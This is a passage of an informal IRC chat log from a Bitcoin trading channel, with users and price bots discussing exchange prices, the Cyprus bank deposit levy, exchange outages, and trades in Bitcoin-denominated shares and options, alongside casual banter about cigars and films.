Mar 28 18:08:30 is this not mybitcoin all over again? Mar 28 18:09:44 ltc trucking up "/ Mar 28 18:14:13 who here smokes cigars from time to time? Mar 28 18:15:25 i did cigarilos sometimes Mar 28 18:15:49 kinda like those Mar 28 18:15:59 Here we go people... about to hit $100 CAD on Virtex https://www.cavirtex.com/orderbook -- now at $99.99 Mar 28 18:16:39 Chaang-Noi: I use it as a hot wallet. Mar 28 18:17:03 CAD? Mar 28 18:17:04 pffft Mar 28 18:17:20 isn't that like ixcoin or something? Mar 28 18:17:58 Heh... it's the alt-fiat of the future Mar 28 18:18:13 CAD that is Mar 28 18:18:42 holding usd or cad.... Mar 28 18:18:51 if i had to hold id do 50 each Mar 28 18:20:12 100 CAD is just a little 300 BTC wall away. Mar 28 18:20:48 http://www.forbes.com/sites/jonmatonis/2013/03/28/tradehill-exchange-adds-dark-pools-of-bitcoin-liquidity/ Mar 28 18:20:54 ^ now there's some hot air Mar 28 18:22:16 yup Mar 28 18:22:24 trade hill looooool Mar 28 18:22:38 i exchange more than they do Mar 28 18:22:52 how does a dark pool not still influence price... Mar 28 18:23:12 a real ojne would Mar 28 18:23:46 i can see how it helps not influence price superficially Mar 28 18:24:01 but in the end, more asks is more asks Mar 28 18:24:16 tradehill = douche bags Mar 28 18:24:36 i dont trust the fuckers, esp as they want dead gox codes Mar 28 18:28:35 as a goat i love cuban cigarz, Mar 28 18:28:42 you can chew on them forevar Mar 28 18:29:06 [HAVELOCK] [VTX] 1 @ 0.48 BTC [+] Mar 28 18:29:54 it is amusing 10k min to open an account, but only 5k in gox code... So amateurish... Mar 28 18:30:05 i like the smell of cigars but the taste and feel makes me feel like cancer is growing in my mouth :/ Mar 28 18:30:32 maybe i just havent had a good enough cigar Mar 28 18:33:08 !last m s.dice Mar 28 18:33:08 Last trade for S.DICE on MPEX was at 0.0031 BTC [-] Mar 28 18:34:25 http://www.teevault.com/wp-content/uploads/2011/11/Now-Panic-and-Freak-Out-Tshirt.jpg Mar 28 18:35:44 http://www2.egovlink.com/press-release-bitcoin.cfm ahem Mar 28 18:36:09 This guidance clarified the rules, and opened the door allowing municipalities to accept Bitcoin. Government entities accepting Bitcoins is a natural evolution, as Bitcoin becomes more popular. Mar 28 18:36:13 lol i got an email from slovenian finance paper Mar 28 18:36:15 Now municipalities can offer their citizens another option in paying for services like permits, utilities, class or event registration, shelter reservations, or even parking tickets. Mar 28 18:36:22 askin about bitcoin Mar 28 18:36:26 if its dying Mar 28 18:36:29 or is it a scam Mar 28 18:36:31 rofl Mar 28 18:36:42 the press is ahead of the curve. Mar 28 18:36:49 haha Mar 28 18:37:20 well apparently they want to write about it - ill try to stop too much idiocy Mar 28 18:37:59 gl Mar 28 18:38:05 uphill battle. Mar 28 18:38:31 yeah Mar 28 18:43:38 mp what do you thinks about last SD trade ? Mar 28 18:46:29 #btct Mar 28 18:46:31 oops Mar 28 18:46:37 guess thats not a channel Mar 28 18:48:09 error4733 nothing, what'd i think ? Mar 28 18:48:11 is there a BTCT chan? Mar 28 18:48:56 o wow there's a mepx chan Mar 28 18:50:05 *an mpex Mar 28 18:50:06 i guess no btct chan.. i was just looking for it Mar 28 18:50:34 unless you are saying "mee-pecks" Mar 28 18:57:03 mp :dunno, last time your analyze was jsut small sell but the big actor stay in Mar 28 18:58:55 but when you see this you shit brick : 467`937 S.DICE @ 0.00310000BTC = 1`450.60470000BTC. Mar 28 19:02:30 ;;calc 1450*7 Mar 28 19:02:31 10150 Mar 28 19:02:41 ;;calc 1450*94 Mar 28 19:02:41 136300 Mar 28 19:05:57 haha thanx, true, it's only 135K$ of 35M$ Mar 28 19:07:28 ;;ticker Mar 28 19:07:28 BTCUSD ticker | Best bid: 93.89001, Best ask: 94.00000, Bid-ask spread: 0.10999, Last trade: 94.00000, 24 hour volume: 64052.68029751, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 91.26068 Mar 28 19:11:16 SD price at .0031 compared to januaru yield of .0002 or feb yield of .0001 (dont remember feb # of the top of mmy head Mar 28 19:12:00 error4733 a that. hehe yeah, kinda blows a hole in that theory huh Mar 28 19:12:47 SD canvhave a bad month here and there.nothing to panic about Mar 28 19:14:02 in sept i think. SD had a negative month.people panicked on lost out on great months after Mar 28 19:14:53 late last year.i dont remember when exactly Mar 28 19:15:23 i think it was sept Mar 28 19:15:27 or maybe oct Mar 28 19:15:45 i thinks is not about negative month it's about btc rise Mar 28 19:15:50 right after ipo s.dice had a string of disasters. first pirate blew up within a week of ipo, froze markets for like a month Mar 28 19:15:56 then they had a red month Mar 28 19:15:56 etc. Mar 28 19:16:14 yes same price 0.0032 Mar 28 19:16:26 but with btc @6$... Mar 28 19:16:43 its been all good since then.weak hands just getting shaken out Mar 28 19:17:08 so you thinks SD value is 35M$ ? Mar 28 19:17:31 i am not a advisor Mar 28 19:18:34 depends how you look at it error4733 Mar 28 19:18:46 yahoo recently paid 500mn for a bs service of summarizing newsfeeds. Mar 28 19:19:26 it probably won't even use it for anything. Mar 28 19:20:50 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [+] Mar 28 19:23:49 google and yahoo and microsoft do that all the time. just to squish competition and get patents. Mar 28 19:27:23 [BTCTC] [PAJKA.BOND] 21 @ 0.09 = 1.89 BTC [-] Mar 28 19:27:37 [BTCTC] [PAJKA.BOND] 1 @ 0.1021 BTC [+] Mar 28 19:27:41 [BTCTC] [PAJKA.BOND] 20 @ 0.102 = 2.04 BTC [-] Mar 28 19:29:44 SP500 all time high Mar 28 19:30:09 btceur looking p bad on btc24 Mar 28 19:30:24 66 eur more likely than you think Mar 28 19:30:51 ;;bids 0 Mar 28 19:30:54 There are currently 34619556 bitcoins demanded at or over 0.0 USD, worth 9415217.04575 USD in total. | Data vintage: 0.0176 seconds Mar 28 19:30:57 maybe i should move to that exchange Mar 28 19:30:58 ... no fees Mar 28 19:31:13 and no api either i think Mar 28 19:31:30 make markets by hand all day Mar 28 19:32:05 [HAVELOCK] [SDICE] 8 @ 0.37100001 = 2.968 BTC [+] Mar 28 19:32:06 [HAVELOCK] [SDICE] 2 @ 0.371 = 0.742 BTC [-] Mar 28 19:32:07 [HAVELOCK] [SDICE] 1 @ 0.37045 BTC [-] Mar 28 19:32:09 [HAVELOCK] [SDICE] 9 @ 0.3703 = 3.3327 BTC [-] Mar 28 19:32:10 [HAVELOCK] [SDICE] 21 @ 0.37025 = 7.7753 BTC [-] Mar 28 19:32:11 [HAVELOCK] [SDICE] 9 @ 0.37 = 3.33 BTC [-] Mar 28 19:37:11 oh it has an api Mar 28 19:39:10 any website has an api. the website is the api Mar 28 19:39:26 ;;bids 0 Mar 28 19:39:26 There are currently 34622807 bitcoins demanded at or over 0.0 USD, worth 9714550.54955 USD in total. | Data vintage: 93.5517 seconds Mar 28 19:39:35 here comes a minirally Mar 28 19:40:42 ;;goxlag Mar 28 19:40:43 0 seconds Mar 28 19:40:49 ;;asks 96 Mar 28 19:40:53 There are currently 4669.9555 bitcoins offered at or under 96.0 USD, worth 445174.658652 USD in total. | Data vintage: 0.0018 seconds Mar 28 19:45:17 jeebus, 'merica doin' practice nuke runs over korea Mar 28 19:47:10 what a shitty site :? Mar 28 19:47:20 which? Mar 28 19:47:26 bitcoin 24 Mar 28 19:47:26 just a little pre workout warmup flex Mar 28 19:48:45 Back in college, was on the roof of a waterfront brownstone for a 4th of July party. B2 bomber did a flyby down the Charles River. Was DOPE. Felt very patriotic. :-P Mar 28 19:49:17 I used to live near the AFB where most of them are stationed Mar 28 19:49:40 at some angles those things were practically invisible Mar 28 19:49:58 [MPEX] [S.MPOE] 4284 @ 0.00060001 = 2.5704 BTC [-] Mar 28 19:50:00 [MPEX] [S.MPOE] 2845 @ 0.0006 = 1.707 BTC [-] Mar 28 19:50:32 Bug, I used to live in Brighton, and Southie Mar 28 19:51:29 mp, can I get a deposit cleared Mar 28 19:52:24 he might not hilight on 'mp' Mar 28 19:52:44 true, thanks Mar 28 19:53:12 micrea_popescu , can I get a deposit cleared Mar 28 19:54:59 flushed again Mar 28 19:55:12 why do you string them out like that anyway ? Mar 28 19:56:49 I am moving money around, and that is what I have at the time. I will bunch them up Mar 28 19:57:08 [BTCTC] [RSM] 1 @ 0.00301 BTC [-] Mar 28 19:57:30 [BTCTC] [RSM] 10 @ 0.003 = 0.03 BTC [-] Mar 28 19:57:55 [BTCTC] [RSM] 2 @ 0.00203 = 0.0041 BTC [-] Mar 28 19:59:08 aite Mar 28 19:59:15 [BTCTC] [RSM] 987 @ 0.00201 = 1.9839 BTC [-] Mar 28 20:02:14 ;;bids 0 Mar 28 20:02:14 There are currently 34623740 bitcoins demanded at or over 0.0 USD, worth 9797949.0585 USD in total. | Data vintage: 6.5180 seconds Mar 28 20:02:20 creeping up to atm Mar 28 20:02:22 ath Mar 28 20:03:17 on bitfloor? Mar 28 20:03:29 ATH was 95.70 Mar 28 20:04:43 bid total Mar 28 20:05:30 oh sry Mar 28 20:09:05 [HAVELOCK] [VTX] 1 @ 0.45 BTC [-] Mar 28 20:09:06 [HAVELOCK] [VTX] 3 @ 0.44888888 = 1.3467 BTC [-] Mar 28 20:09:08 [HAVELOCK] [VTX] 26 @ 0.446 = 11.596 BTC [-] Mar 28 20:09:09 [HAVELOCK] [VTX] 10 @ 0.445 = 4.45 BTC [-] Mar 28 20:18:12 [BTCTC] [ASICMINER-PT] 14 @ 0.73 = 10.22 BTC [+] Mar 28 20:21:53 ;;ticker Mar 28 20:21:53 BTCUSD ticker | Best bid: 93.51007, Best ask: 94.23500, Bid-ask spread: 0.72493, Last trade: 93.51006, 24 hour volume: 63226.19879144, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 91.59074 Mar 28 20:22:23 just woke up Mar 28 20:22:27 *yawn Mar 28 20:25:31 I missed a pretty good conversation earlier. Namworld you're confusing things tho. burnside isn't touching fiat afaik. Mar 28 20:26:41 https://bitcointalk.org/index.php?topic=160292.msg1692107;boardseen#new Mar 28 20:30:14 So yeah, BTC Trading Corp is based in Belize. It has a native Belize corporate director. It has no bank accounts anywhere. It does not touch USD. Mar 28 20:31:39 Bow, that link is so sad if its true Mar 28 20:31:50 it doesnt ;look fake Mar 28 20:31:53 ill check thwe pixels Mar 28 20:31:55 indeed Mar 28 20:32:02 Even if its not, it is true for many businesses in Cyprus Mar 28 20:32:13 hideous thing Mar 28 20:33:57 i want to see! what is thing? Mar 28 20:34:13 https://bitcointalk.org/index.php?topic=160292.msg1692107 Mar 28 20:34:59 ahahahaha Mar 28 20:35:04 i mean Mar 28 20:35:05 sucks Mar 28 20:35:24 dangers of operating out of a russian owned tax haven Mar 28 20:35:33 in a fucked up fake continental government Mar 28 20:35:49 thanks thieves. Mar 28 20:36:16 is this massive freezing of funds s.o.p. for cypress? i was under the impression they were just getting a 10% asset haircut. Mar 28 20:36:22 er, holdings? Mar 28 20:36:22 no nono Mar 28 20:36:31 40% officially, with total frozen Mar 28 20:36:38 up to 80% possibly though Mar 28 20:36:40 who 40% haircut? Mar 28 20:36:42 wow Mar 28 20:36:47 everything over 100k Mar 28 20:36:55 wow Mar 28 20:36:58 just. wow. Mar 28 20:37:07 this is the alternative to taking the under 100k stuff Mar 28 20:37:11 right Mar 28 20:37:14 fuck the business owners Mar 28 20:37:26 this is why bitcoin is exploding upwards, yah know! Mar 28 20:37:28 people who add real value to your economy Mar 28 20:38:05 [HAVELOCK] [HIM] 3 @ 1.88 = 5.64 BTC [+] Mar 28 20:38:15 also, eurozone minister has said that due to lack of contaigon from this move means that they will look at this for recapitalization of any euro country. Mar 28 20:38:24 its a BFD Mar 28 20:40:05 [HAVELOCK] [VTX] 2 @ 0.479 = 0.958 BTC [+] Mar 28 20:42:50 nice Mar 28 20:42:53 down with the eu Mar 28 20:43:09 may they rot in the statist hell of their own fabrication Mar 28 20:48:06 "democracy is the theory that people know what they want and deserve to get it good and hard" Mar 28 20:49:17 :/ Mar 28 20:52:44 which is why we have the "zero euro tolerance policy" to go witgh the earlier "zero usd tolerance policy" Mar 28 20:54:06 [HAVELOCK] [VTX] 8 @ 0.445 = 3.56 BTC [-] Mar 28 20:54:12 Bugpowder who said that/where ? Mar 28 20:55:15 [BTCTC] [ASICMINER-PT] 8 @ 0.73 = 5.84 BTC [+] Mar 28 20:56:06 [HAVELOCK] [VTX] 1 @ 0.44 BTC [-] Mar 28 20:56:07 [HAVELOCK] [VTX] 1 @ 0.44 BTC [-] Mar 28 20:57:22 [BTCTC] [ASICMINER-PT] 11 @ 0.74 = 8.14 BTC [+] Mar 28 20:57:39 At Berenberg Bank in London, chief economist Holger Schmieding said the lesson is that “countries will take a lot of pain to stay in the eurozone. The glue that holds the eurozone together remains strong.” Mar 28 20:57:44 i guess we know which bank is going away next. Mar 28 20:58:02 ;;ticker Mar 28 20:58:03 BTCUSD ticker | Best bid: 93.50003, Best ask: 93.92000, Bid-ask spread: 0.41997, Last trade: 93.92000, 24 hour volume: 62212.42069655, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 91.71323 Mar 28 20:58:06 [HAVELOCK] [VTX] 19 @ 0.412 = 7.828 BTC [-] Mar 28 21:00:11 mircea_popescu: I saw it somewhere yesterday. Mar 28 21:00:20 i sourced it meanwhile. Mar 28 21:00:37 Dijsselbloem dood. Mar 28 21:01:19 agricultural economist of great repute. Mar 28 21:02:26 bright mind behind the sns real nationalisation earlier this year. Mar 28 21:09:27 [BTCTC] [ASICMINER-PT] 1 @ 0.74 BTC [+] Mar 28 21:09:36 btcquick seems to be out of coins too. Mar 28 21:12:20 https://bitcointalk.org/index.php?topic=159935.msg1692099#msg1692099 Mar 28 21:12:24 coinbase fucks up more. Mar 28 21:12:31 because there was really room or need for it. Mar 28 21:13:13 [BTCTC] [ASICMINER-PT] 1 @ 0.721 BTC [-] Mar 28 21:14:51 unbeliable.. Mar 28 21:15:02 DeathandTaxes is always pretty funny to read Mar 28 21:15:19 ltc seems to be rising Mar 28 21:15:43 coinbase (not CERN) discovers the antiBitcoin... Mar 28 21:15:55 heh Mar 28 21:16:06 Transisto hey, is cavirtex your thing ? Mar 28 21:19:05 [HAVELOCK] [VTX] 3 @ 0.449 = 1.347 BTC [+] Mar 28 21:19:07 i know someone (not me) got more than they should Mar 28 21:19:09 from base Mar 28 21:21:07 kakobrekla: i've been trying to send teh extra 30btc they put in my account several times. never confirms though... Mar 28 21:21:26 Those 30BTC reappear about twice a week, then they are gone. Mar 28 21:21:31 oh yeah, frequent occurance, i can proxy that for you Mar 28 21:21:46 oh Mar 28 21:21:48 nvm Mar 28 21:21:59 i thought you got em off Mar 28 21:22:30 maybe it's for a mpex acct reg. Mar 28 21:23:31 its folks like coinbase that are the real threat to bitcoin... Mar 28 21:24:22 I think it's honest ineptitude. Mar 28 21:24:45 they don't have the staff or know-how to keep the whole venture together. Mar 28 21:25:49 unfortunate Mar 28 21:26:33 important lesson from youth - don't bite off more than you can chew... Mar 28 21:27:06 [HAVELOCK] [SDICE] 10 @ 0.391 = 3.91 BTC [+] Mar 28 21:27:07 [HAVELOCK] [SDICE] 10 @ 0.39099999 = 3.91 BTC [-] Mar 28 21:28:11 storm brewing Mar 28 21:29:15 taub, is that BTC based coffee haus? ;p Mar 28 21:29:26 ooh, i got some coffee for BTC Mar 28 21:29:42 whole beans, i had to grind it myself Mar 28 21:31:11 uh oh Mar 28 21:31:21 ;;ticker Mar 28 21:31:22 BTCUSD ticker | Best bid: 93.50003, Best ask: 94.20987, Bid-ask spread: 0.70984, Last trade: 94.20987, 24 hour volume: 61725.33652781, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 91.83414 Mar 28 21:31:28 ;;goxlag Mar 28 21:31:28 ohhh noooo Mar 28 21:31:29 34.970504 seconds Mar 28 21:31:36 ? Mar 28 21:31:44 5000 BTC dump Mar 28 21:32:02 half a milli yo! Mar 28 21:32:13 wow Mar 28 21:32:46 now how will the market respond Mar 28 21:32:55 i think gox runs on a comodore 64 Mar 28 21:32:58 umm. buy? Mar 28 21:33:54 ;;goxlag Mar 28 21:33:55 121.671051 seconds Mar 28 21:34:01 the bid is 1 higher than the as on clarkmoody Mar 28 21:34:06 hehe Mar 28 21:34:09 ask* Mar 28 21:35:19 !ticker m s.mpoe Mar 28 21:35:21 [MPEX:S.MPOE] 1D: 0.0006 / 0.00060667 / 0.00061111 (71731 shares, 43.52 BTC), 7D: 0.0006 / 0.00066734 / 0.00073756 (1700409 shares, 1,134.76 BTC), 30D: 0.0006 / 0.00073559 / 0.00078628 (16751673 shares, 12,322.39 BTC) Mar 28 21:35:21 ;;ticker Mar 28 21:35:22 BTCUSD ticker | Best bid: 92.50010, Best ask: 92.56500, Bid-ask spread: 0.06490, Last trade: 92.50010, 24 hour volume: 61725.33652781, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 91.83414 Mar 28 21:35:31 ;;calc 606670 * 91.83414 Mar 28 21:35:32 55713017.7138 Mar 28 21:35:34 MWHAHAHAHA Mar 28 21:35:35 coinlab is current it seems 94 Mar 28 21:35:39 FIRST! Mar 28 21:35:52 ? Mar 28 21:36:22 $55 Million in 24 hrs. Mar 28 21:36:30 wait Mar 28 21:36:55 ThickAsThieves https://twitter.com/Mircea_Popescu/status/317359515882385408 Mar 28 21:37:15 oh you! Mar 28 21:37:24 grats! Mar 28 21:37:24 ta-nanana Mar 28 21:37:58 ;;ticker Mar 28 21:37:58 BTCUSD ticker | Best bid: 93.50003, Best ask: 93.85000, Bid-ask spread: 0.34997, Last trade: 93.50002, 24 hour volume: 61725.33652781, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 91.83414 Mar 28 21:38:02 congrats Mar 28 21:38:16 took that selloff like a champ too Mar 28 21:38:49 lol dat background on twitter Mar 28 21:38:59 [MPEX] [S.DICE] 2000 @ 0.00398996 = 7.9799 BTC [+] Mar 28 21:39:15 [MPEX] [S.MPOE] 2100 @ 0.00060104 = 1.2622 BTC [+] Mar 28 21:39:19 mp you look a lot diff in some pics Mar 28 21:39:28 are some from years ago? Mar 28 21:39:37 lyke sometimes u so sexxy Mar 28 21:39:43 [MPEX] [S.MPOE] 15000 @ 0.00061412 = 9.2118 BTC [+] Mar 28 21:39:43 but sometimes not Mar 28 21:39:45 ThickAsThieves well the one on twitter background is from like 2004 Mar 28 21:39:57 lol Mar 28 21:39:58 Bugpowder i think that depends on who's taking da pix Mar 28 21:40:07 thats from his OKcupid profile Mar 28 21:40:14 sometimes you look like a professor, some like a folsky metrosexual :) Mar 28 21:40:24 folksy* Mar 28 21:40:25 sometimes a terrorist Mar 28 21:40:32 [MPEX] [S.DICE] 1350 @ 0.00398997 = 5.3865 BTC [+] Mar 28 21:40:42 S.DICE RALLY Mar 28 21:40:48 lol Mar 28 21:40:49 [MPEX] [S.MPOE] 900 @ 0.00061412 = 0.5527 BTC [+] Mar 28 21:41:07 jborkl is making some buys Mar 28 21:41:37 [MPEX] [S.MPOE] 8700 @ 0.00062188 = 5.4104 BTC [+] Mar 28 21:41:56 ThickAsThieves "Seemingly, but within that basic framework there are many subtle variations only discernible to an acute observer that reflect the many moods, the many shades, the many sides of George Costanza." Mar 28 21:42:08 ;;ticker Mar 28 21:42:09 BTCUSD ticker | Best bid: 93.00001, Best ask: 93.84000, Bid-ask spread: 0.83999, Last trade: 93.84000, 24 hour volume: 65843.44932600, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 91.98969 Mar 28 21:42:50 "Everyone's blessed with one special thing." ~ Dirk Diggler Mar 28 21:43:02 lol Mar 28 21:44:44 looks like bitfinex is down... Mar 28 21:44:53 mp, i do hope you've seen Boogie Nights Mar 28 21:45:15 nope Mar 28 21:45:19 oh man Mar 28 21:45:23 man.. Mar 28 21:45:28 i have a feeling you'll LOVE it Mar 28 21:45:33 gotta see it Mar 28 21:45:34 i can't stand julienne moore Mar 28 21:45:39 yea gotta see it Mar 28 21:45:45 yeah she's a little freaky looking Mar 28 21:45:59 but it's a great flick imo Mar 28 21:46:03 i think julliane moore will surprise you in this movie Mar 28 21:46:05 she's liek the embodiment of why gingers are alien evil things Mar 28 21:46:36 oh man Mar 28 21:46:43 she is great in that movie Mar 28 21:46:48 what a great movie Mar 28 21:46:49 can anyone else get to bitfinex? Mar 28 21:46:53 I need to watch that again Mar 28 21:46:54 All right. My Casa coin is here, I will pick it up Mar 28 21:46:56 Wooooot Mar 28 21:46:57 been 10 years Mar 28 21:47:08 its great not because its about porn too Mar 28 21:47:15 its just great Mar 28 21:47:22 I usually chuck coins around.. this one is gonna be precious Mar 28 21:48:11 lol okay, i'll add it to the list Mar 28 21:48:41 if i get pissed off and end up whipping innocenty bystander nude girlies it'll be on your collective conscience. Mar 28 21:48:47 yikes: http://www.bitcoinity.org/markets?currency=USD&exchange=btce Mar 28 21:49:15 btce does shit like that sometimes Mar 28 21:49:31 [MPEX] [O.BTCUSD.C610T] 987 @ 0.34793577 = 343.4126 BTC [+] Mar 28 21:49:42 ;;market --sell 700 Mar 28 21:49:42 A market order to sell 700 bitcoins right now would net 64397.2774 USD and would take the last price down to 91.5000 USD, resulting in an average price of 91.9961 USD/BTC. | Data vintage: 44.7079 seconds Mar 28 21:49:51 massive sellof Mar 28 21:49:53 no, you'd get pissed if i told you to watch Magnolia Mar 28 21:49:57 on gox that wouldn't have gone so far Mar 28 21:50:19 i think this is it, we only got so far so i could have my 50mn landmark Mar 28 21:50:24 or maybe you'd like it Mar 28 21:50:25 fasten buttbelts, we're going to 35 Mar 28 21:50:35 its the best worst movie ive seen Mar 28 21:50:45 [MPEX] [O.BTCUSD.C630T] 1000 @ 0.32624087 = 326.2409 BTC [+] Mar 28 21:50:47 agreed, terrible Mar 28 21:51:53 yeap. back to single digits Mar 28 21:51:54 !ticker Mar 28 21:51:55 Yeah. No damn tobacco, that's for sure. Mar 28 21:51:56 ;;ticker Mar 28 21:51:57 BTCUSD ticker | Best bid: 93.28000, Best ask: 93.38999, Bid-ask spread: 0.10999, Last trade: 93.28000, 24 hour volume: 66005.58663438, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 92.00435 Mar 28 21:51:58 ;;ticker Mar 28 21:51:59 BTCUSD ticker | Best bid: 93.28000, Best ask: 93.38999, Bid-ask spread: 0.10999, Last trade: 93.28000, 24 hour volume: 66005.58663438, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 92.00435 Mar 28 21:52:07 Sell off of USD? Mar 28 21:52:17 huh? Mar 28 21:52:20 http://bitcoincharts.com/charts/chart.png?width=940&m=mtgoxUSD&SubmitButton=Draw&r=2&i=&c=0&s=&e=&Prev=&Next=&t=S&b=&a1=&m1=10&a2=&m2=25&x=0&i1=&i2=&i3=&i4=&v=1&cv=0&ps=0&l=0&p=0& Mar 28 21:52:25 Just got off the phone with Tesla Mar 28 21:52:26 i wouldn't be surprised to see a selloff down to the 60's Mar 28 21:52:35 test drive on Saturday, after the Audi visit Mar 28 21:52:37 thats a big red boner Mar 28 21:52:48 pgp, we will probably hit the 60s and bounce right back Mar 28 21:52:57 maybe this weekend Mar 28 21:53:02 i agree as well Mar 28 21:53:06 i am not seeing this drop you speak of Mar 28 21:53:09 94 Mar 28 21:53:18 i said selloff not drop. Mar 28 21:53:23 I have quite the stack in gox ready to go Mar 28 21:53:35 It's just means weak hands going to strong hands Mar 28 21:53:36 thats all Mar 28 21:53:39 lol Mar 28 21:53:44 [MPEX] [O.BTCUSD.C650T] 1000 @ 0.30475646 = 304.7565 BTC [+] Mar 28 21:53:47 I'm so weeeek Mar 28 21:54:03 Tesla is just stroger than you Mar 28 21:54:05 options have been closing out, eh? Mar 28 21:54:23 the guy selling this options is literally an idiot Mar 28 21:54:35 ;;bc,24hprc Mar 28 21:54:36 (sorry if you are listening) Mar 28 21:54:37 91.87 Mar 28 21:54:39 smickles slowly yeah Mar 28 21:54:43 that's right - lots of new entrants - they'll run for cover at the first sign of trouble Mar 28 21:54:54 Bugpowder i've noticed the low ones are selling, like 610 630 Mar 28 21:55:04 maybe he judges the potential upside not worth the risk. Mar 28 21:55:12 lol, Bugpowder I was about to ask if that was you :D Mar 28 21:55:15 hmmm Mar 28 21:55:20 more selling at BTC-e... Mar 28 21:55:23 [BTCTC] [BASIC-MINING] 1 @ 0.36 BTC [-] Mar 28 21:55:23 what is the time premium on them right now Mar 28 21:55:34 pretty much nothing. Mar 28 21:55:52 but something like this : got them around 10, selling them for 30something is 3x his capital. Mar 28 21:55:56 why wait for maybe 4x ? Mar 28 21:56:14 maybe wants to cash out? Mar 28 21:56:23 ;;calc (91.87-65)/91.87 Mar 28 21:56:23 0.292478502231 Mar 28 21:56:40 ;;calc .30475-(91.87-65)/91.87 Mar 28 21:56:40 0.0122714977686 Mar 28 21:57:00 ;;calc (.30475-(91.87-65)/91.87)*91.87 Mar 28 21:57:01 1.1273825 Mar 28 21:57:10 hmm Mar 28 21:57:18 ok. It's not idiocy Mar 28 21:58:04 not sure if I agree with it but, vwap is effectively priced at 93.0 with the bot bid Mar 28 21:59:04 bot goes offline at 00:00 GMT? Mar 28 21:59:33 no, just stops quoting t's. Mar 28 21:59:53 yeah, but it happens at 00:00 GMT? Mar 28 21:59:56 yeah Mar 28 21:59:59 ok Mar 28 22:00:01 am i the only one left holding s.dice Mar 28 22:00:02 ? Mar 28 22:00:17 couldn't be Mar 28 22:00:20 i dumped dice a long time ago Mar 28 22:00:20 lol Mar 28 22:00:21 gesell: someone is holding 13MM share Mar 28 22:00:36 just a blip in the long term Mar 28 22:01:14 gesell unless you're holding > 10mn i'd say no. Mar 28 22:01:50 !ticker m S.MPOE Mar 28 22:01:51 [MPEX:S.MPOE] 1D: 0.0006 / 0.0006091 / 0.00062188 (98431 shares, 59.95 BTC), 7D: 0.0006 / 0.00066543 / 0.00072379 (1699609 shares, 1,130.98 BTC), 30D: 0.0006 / 0.0007354 / 0.00078628 (16778373 shares, 12,338.83 BTC) Mar 28 22:01:55 poor mircea_popescu Mar 28 22:02:04 poor, poor, poor sir robert Mar 28 22:02:16 need to start making arrangements to short MPOE at this rate... Mar 28 22:02:27 http://www.youtube.com/watch?v=c4SJ0xR2_bQ Mar 28 22:02:41 why you sending me youtube videos if you don't have flash :P Mar 28 22:03:19 youtube doesnt need flash Mar 28 22:03:22 bitfinex is still unavailable - I wonder what's going on... Mar 28 22:03:47 the verge just reposted that businessweek article Mar 28 22:03:50 http://www.theverge.com/2013/3/28/4157796/an-optimistic-theory-of-bitcoin-as-a-hedge-against-the-entire-global Mar 28 22:03:55 incapable fucks are doing bitcoin is what its going on Mar 28 22:04:54 [MPEX] [S.MPOE] 6300 @ 0.00062188 = 3.9178 BTC [+] Mar 28 22:04:56 [MPEX] [S.MPOE] 11865 @ 0.00062464 = 7.4114 BTC [+] Mar 28 22:04:58 [MPEX] [S.MPOE] 14100 @ 0.00062766 = 8.85 BTC [+] Mar 28 22:05:01 that's a surprise Mar 28 22:05:09 ;;ticker Mar 28 22:05:10 BTCUSD ticker | Best bid: 92.13482, Best ask: 93.29999, Bid-ask spread: 1.16517, Last trade: 93.29999, 24 hour volume: 66166.83414017, 24 hour low: 86.63000, 24 hour high: 95.70000, 24 hour vwap: 92.03285 Mar 28 22:05:10 incapable fucks doing bitcoin Mar 28 22:05:17 ;;bc,24hprc Mar 28 22:05:18 91.98 Mar 28 22:05:32 ;;goxlag Mar 28 22:05:33 0.296031 seconds Mar 28 22:05:46 are there historical charts for S.DICE? would be interested to see how the stock performed during similar rocky months Mar 28 22:06:04 whoa mpex hosts bitcoinity? Mar 28 22:06:08 who runs bitcoinity? Mar 28 22:06:11 SHOW YOURSELF Mar 28 22:06:24 ;;seen smickles Mar 28 22:06:24 smickles was last seen in #bitcoin-assets 6 minutes and 7 seconds ago: couldn't be Mar 28 22:07:17 pgp maybe somebody finally got bored of their idiocy and used one of the five i mean eight i mean nine billion ror 0days Mar 28 22:07:33 thestringpuller comboy. Mar 28 22:08:44 ThickAsThieves i like these journotards copy/pasting dumbed down versions of what i was writing months ago and figuring they're part of the conversation. Mar 28 22:08:53 my spidey sense tells me that something is about to happen Mar 28 22:10:22 the bubble is about to collapse Mar 28 22:10:31 because popescu is going to sell off 400000 coins Mar 28 22:10:39 ;;market sell 400000 Mar 28 22:10:42 A market order to sell 400000 bitcoins right now would net 9392061.3579 USD and would take the last price down to 0.1000 USD, resulting in an average price of 23.4802 USD/BTC. | Data vintage: 0.0149 seconds Mar 28 22:11:33 at least theyre trying? Mar 28 22:12:03 i guess so. Mar 28 22:12:07 anyway, i'm not selling anything. Mar 28 22:12:15 please don't Mar 28 22:12:16 hehe Mar 28 22:12:48 a shakeout at these level would be healthy Mar 28 22:12:52 i need my bitcoins to trade 5 for a used tesla later on. Mar 28 22:12:58 [MPEX] [S.MPOE] 5000 @ 0.00062187 = 3.1094 BTC [-] Mar 28 22:13:15 [MPEX] [O.BTCUSD.C630T] 1000 @ 0.32710954 = 327.1095 BTC [+] Mar 28 22:14:06 whoa whoa Mar 28 22:14:08 more calls! Mar 28 22:14:28 am i confused or is buying that option so close to deadline rather questionable? Mar 28 22:14:31 ;;calc (98 - 63) / 98 Mar 28 22:14:31 0.357142857143 Mar 28 22:14:36 now Mar 28 22:14:42 that might pay off Mar 28 22:14:53 im pretty sure those are sold not bought Mar 28 22:15:01 thestringpuller: probably selling back purchased ones Mar 28 22:15:03 at a profit Mar 28 22:15:19 oh, maybe i misunderstand how the [+] works Mar 28 22:15:27 + means greater than last price Mar 28 22:15:29 + just means current price higher than prev price Mar 28 22:15:34 - means less than last price Mar 28 22:15:44 thats funny, because thats what i used to think it meant Mar 28 22:15:48 and then i was like nah Mar 28 22:15:54 it must be buy/sell Mar 28 22:16:14 yea those were 